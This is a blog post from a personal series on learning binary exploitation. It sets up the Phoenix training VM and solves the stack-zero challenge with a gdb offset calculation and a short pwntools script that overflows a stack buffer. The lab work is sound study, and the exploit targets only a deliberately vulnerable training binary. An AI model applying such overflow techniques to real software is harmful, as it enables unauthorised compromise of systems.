BuringStraw

BuringStraw

HomeArchives

[pwn Notes 0] Phoenix Environment Setup and stack-zero

#pwn#stack77
AI Translation
This post is translated from Chinese into English through AI.View Original
AI-generated summary
The author sets up the Phoenix environment for learning pwn and completes the stack-zero challenge. They download a virtual machine image, start the VM, use netcat for program forwarding, and exploit the stack-zero program by overflowing a variable. They also use pwntools for the exploit script.

I found a project to learn pwn at http://exploit.education, and decided to temporarily learn pwn to get back on track. I'll try starting a note series (I always forget how to write pwntools scripts) and hopefully won't give up halfway. Let's set a small goal, at least finish the Phoenix series.

Environment Setup#

First, download the virtual machine image of Phoenix from the more-downloads section, choose according to your architecture. This will be the target machine. Before starting, we need to install qemu-system-x86 (64-bit is also in the same package (archlinux)).

Run boot-balabala.sh to start the virtual machine, which opens ssh on port 2222 by default. The username and password are both "user".

If you want to use netcat to forward the programs inside, just add another port forwarding in the startup script, here is an example of the network line.

-netdev user,id=unet,hostfwd=tcp:127.0.0.1:2222-:22,hostfwd=tcp:127.0.0.1:3333-:3333

Then, execute the following command inside the virtual machine.

mkfifo io

And create a script file (start.sh).

#!/bin/bash
cat io|$1 -i 2>&1|nc -l 3333 > io

Now you can start netcat by using sh start.sh /opt/phoenix/amd64/stack-zero, remember to match the port 3333 with the one in the startup script.

The gdb in the virtual machine is installed with gef by default, but I don't know how to use it, so I copied peda into it. Skipping this part.

On the host machine, install a very convenient tool called pwntools: pip install pwntools

stack-zero#

The program is quite simple, I used cutter directly.

![Screenshot_Region_20230215183930.png](/pics/[pwn Notes 0] Setting up Phoenix Environment and stack-zero 366826c7bb10483aa08121888111f984/Screenshot_Region_20230215183930.png)

(Actually, the source code is provided on the exploit.education website) (The comment at the beginning is even a joke)

Now we need to overflow s into var_10h (changeme), the content can be anything. Open gdb, calculate the distance, and input something random first.

![Untitled](/pics/[pwn Notes 0] Setting up Phoenix Environment and stack-zero 366826c7bb10483aa08121888111f984/Untitled.png)

The string is at 0x620.

![Untitled](/pics/[pwn Notes 0] Setting up Phoenix Environment and stack-zero 366826c7bb10483aa08121888111f984/Untitled%201.png)

The conditional statement, changeme is at rbp-0x10 which is 0x670-0x10.

Calculate 0x660-0x620=0x40.

So we just need to output 0x41 'a's.

To practice using pwntools, write some code.

Here I connected directly using ssh, no need for nc.

from pwn import *

shell = ssh("user", "localhost", password="user", port=2222)
sh = shell.run("/opt/phoenix/amd64/stack-zero")
print(sh.recvline())
sh.sendline(b"a"*0x41)
print(sh.recvline())
shell.close()

Success!

![Untitled](/pics/[pwn Notes 0] Setting up Phoenix Environment and stack-zero 366826c7bb10483aa08121888111f984/Untitled%202.png)

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.